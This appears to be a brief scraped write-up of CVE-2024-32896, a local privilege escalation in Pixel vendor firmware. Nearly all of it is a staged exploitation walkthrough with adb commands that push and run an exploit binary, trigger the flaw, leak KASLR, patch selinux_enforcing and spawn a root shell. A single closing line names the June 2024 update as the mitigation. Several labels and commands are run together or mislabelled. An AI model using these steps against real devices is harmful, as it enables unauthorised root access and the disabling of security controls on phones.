$cat snippet_cve-2024-32896.sh
adb shell /data/local/tmp/exploit.bin --trigger ./pixel-lpe --target=oriole --kaslr-leak
Overview
A logic flaw in Pixel-specific vendor firmware allows local privilege escalation to root without unlocking the bootloader.
Setup
$cat output.bash
adb push exploit.bin /data/local/tmp/
adb shell chmod +x /data/local/tmp/exploit.binStage 1 — Trigger
$cat output.bash
adb shell /data/local/tmp/exploit.bin --triggerStage 2 — KASLR leak & escalate
$cat output.bash
./pixel-lpe --target=oriole --kaslr-leakAfter the leak we patch selinux_enforcing and spawn a root shell.
Mitigation
Apply the June 2024 Pixel security update.
#Android#Pixel#LPE#Firmware